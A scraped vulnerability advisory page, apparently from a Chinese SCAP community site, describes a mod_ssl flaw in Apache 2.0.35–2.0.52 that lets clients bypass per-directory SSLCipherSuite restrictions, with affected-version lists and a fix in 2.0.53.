+ RedHat Linux 9.0 i386
+ RedHat Linux 8.0
+ Terra Soft Solutions Yellow Dog Linux 3.0
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 2.0.38
Apache Software Foundation Apache 2.0.37
Apache Software Foundation Apache 2.0.36
Apache Software Foundation Apache 2.0.35
Apache Software Foundation Apache 2.0.53

- 不受影响的程序版本

Apache Software Foundation Apache 2.0.53

- 漏洞讨论

Apache 2.x mod_ssl is reported prone to a restriction-bypass vulnerability. This issue presents itself when mod_ssl is configured to be used with the 'SSLCipherSuite' directive in a 'Directory' or 'Location' context. Reportedly, this vulnerability allows a client to use any cipher suite allowed by the virtual host configuration regardless of cipher suites specified for a specific directory. This can allow an attacker to bypass security policies and use potentially weaker encryption types than allowed.

Apache 2.0.35 to 2.0.52 are reported vulnerable to this issue.

- 漏洞利用

An exploit is not required to leverage this issue.

- 解决方案

Apache 2.0.53-dev is reportedly not affected by this issue; this is not confirmed at the moment. Please contact the vendor for more information.

The Apache Software Foundation has released Apache version 2.0.53 dealing with this issue.

Please see the referenced vendor advisories for further information.


Sun Solaris 10

Sun Solaris 10.0_x86

Conectiva Linux 10.0

Apple Mac OS X Server 10.3.9

VMWare ESX Server 2.0.1

Apache Software Foundation Apache 2.0.35

Apache Software Foundation Apache 2.0.36

Apache Software Foundation Apache 2.0.37

Apache Software Foundation Apache 2.0.38

Apache Software Foundation Apache 2.0.39

Apache Software Foundation Apache 2.0.40

Apache Software Foundation Apache 2.0.41

Apache Software Foundation Apache 2.0.43

Apache Software Foundation Apache 2.0.44

Apache Software Foundation Apache 2.0.45

Apache Software Foundation Apache 2.0.46

Apache Software Foundation Apache 2.0.47

Apache Software Foundation Apache 2.0.48

Apache Software Foundation Apache 2.0.49

Apache Software Foundation Apache 2.0.50

Apache Software Foundation Apache 2.0.52

VMWare ESX Server 2.1.1

VMWare ESX Server 2.1.2

mod_ssl mod_ssl 2.8.12

mod_ssl mod_ssl 2.8.15

mod_ssl mod_ssl 2.8.9

IBM Hardware Management Console (HMC) for iSeries 3.3.2

    - 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站